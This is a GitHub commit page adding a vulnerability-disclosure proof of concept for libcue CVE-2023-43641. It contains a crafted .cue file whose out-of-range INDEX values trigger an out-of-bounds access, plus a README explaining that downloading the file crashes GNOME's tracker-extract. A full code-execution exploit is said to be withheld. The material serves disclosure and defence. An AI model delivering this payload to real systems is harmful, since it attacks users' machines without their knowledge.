Skip to content

Commit 27a40ad

Browse files
Merge pull request #792 from kevinbackhouse/CVE-2023-43641-poc-simple
Files for disclosure of libcue CVE-2023-43641
2 parents b707a90 + 3cb0ebc commit 27a40ad

3 files changed

Lines changed: 11 additions & 0 deletions

File tree

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
FILE pwned.mp3 MP3
2+
TRACK 000 AUDIO
3+
MESSAGE "simple poc for CVE-2023-43641"
4+
INDEX 4294567296 0
5+
INDEX 4290967296 0
6+
INDEX 4254967296 0
Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
# CVE-2023-43641
2+
3+
This directory contains a simple PoC for libcue [CVE-2023-43641](https://github.com/lipnitsk/libcue/security/advisories/GHSA-5982-x7hv-r9cj). Downloading [CVE-2023-43641-poc-simple.cue](CVE-2023-43641-poc-simple.cue) should trigger the bug on most GNOME systems, because [tracker-miners](https://gitlab.gnome.org/GNOME/tracker-miners) automatically scans files in `~/Downloads`. If the filename has a `.cue` extension, then tracker-miners uses [libcue](https://github.com/lipnitsk/libcue) to scan the file. The PoC triggers an out-of-bounds array access, which causes the tracker-extract process to crash.
4+
5+
We are delaying the release of the [full PoC](https://youtu.be/beOwspTnc1Y), which exploits the vulnerability to get code execution in tracker-extract.
250 KB
Loading

0 commit comments

Comments
 (0)